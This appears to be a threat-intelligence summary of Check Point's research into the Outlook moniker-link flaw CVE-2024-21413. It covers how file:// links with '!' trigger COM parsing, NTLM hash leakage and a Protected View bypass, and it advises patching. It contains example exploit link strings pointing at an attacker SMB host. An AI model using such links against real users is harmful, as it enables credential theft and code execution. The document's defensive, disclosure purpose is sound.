Keypoints
- Outlook treats certain file:// links that include an exclamation mark (e.g., file:///10.10.111.111testtest.rtf!item) as COM “Moniker Links” instead of ordinary file URLs.
- When such a link is clicked, Outlook calls ole32!MkParseDisplayName(), passing the moniker string (the file prefix is removed) to the COM parsing APIs.
- The composite moniker is interpreted as a FileMoniker plus an ItemMoniker, which directs Windows to run a COM server (e.g., Word) to “look up” the object referenced by the moniker.
- Microsoft Word, launched as a COM server in the background, will open and parse the remote RTF file over SMB, which can leak NTLM credential hashes to the attacker-controlled server.
- Because the document is parsed by Word in COM-server mode at Medium integrity, this workflow can bypass Protected View and enable exploitation of parsing bugs to achieve remote code execution.
- Check Point reproduced a crash in WINWORD.EXE using an RTF PoC and confirmed the MkParseDisplayName breakpoint is hit when the link is clicked.
- Microsoft issued a critical Outlook patch (CVE-2024-21413) to address the issue; users should apply the update promptly.
MITRE Techniques
- No MITRE ATT&CK technique IDs are explicitly mentioned in the article – ‘…the article does not reference MITRE ATT&CK techniques by ID, it describes a COM moniker parsing and exploitation flow that results in credential leakage and potential remote code execution.’
Indicators of Compromise
- [IP address] example used in PoC – 10.10.111.111 (attacker-controlled SMB host used in test links)
- [Filename] remote resource referenced – test.rtf (example RTF file fetched by Word), and other attachment names implied
- [URL/Link string] moniker example – file:///10.10.111.111testtest.rtf!something (shows composite Moniker format that triggers COM parsing)
- [Vulnerability ID] patch reference – CVE-2024-21413 (Outlook security update addressing the bug)
Outlook’s hyperlink handling treats regular http(s) links as browser targets, but when a file:// link contains an exclamation mark (e.g., file:///10.10.111.111testtest.rtf!something) Outlook strips the file prefix and passes the remaining string to ole32!MkParseDisplayName(). That call interprets the string as a composite moniker (FileMoniker + ItemMoniker), which causes Windows to invoke the appropriate COM server (for .rtf, Microsoft Word) to resolve the moniker and access the referenced file.
Once invoked as a COM server, Word runs in the background and opens/parses the remote RTF over SMB; that network access can expose NTLM authentication material to the attacker-controlled host. Because the parsing occurs in Word’s COM-server context at Medium integrity and not in Protected View, any parsing vulnerability in the target application (Word or other COM servers) can be triggered directly from a single click, enabling potential remote code execution. Check Point validated the flow by hitting a breakpoint on MkParseDisplayName() in WinDbg and reproducing a WINWORD.EXE crash with an RTF PoC.
Mitigation requires patching: Microsoft released a critical Outlook update (CVE-2024-21413) that addresses this behavior—apply it immediately. Developers and security teams should audit uses of MkParseDisplayName/MkParseDisplayNameEx and test inputs that follow the moniker pattern (file:///ippath!item) to find other affected software that might hand attacker-controlled monikers to COM APIs.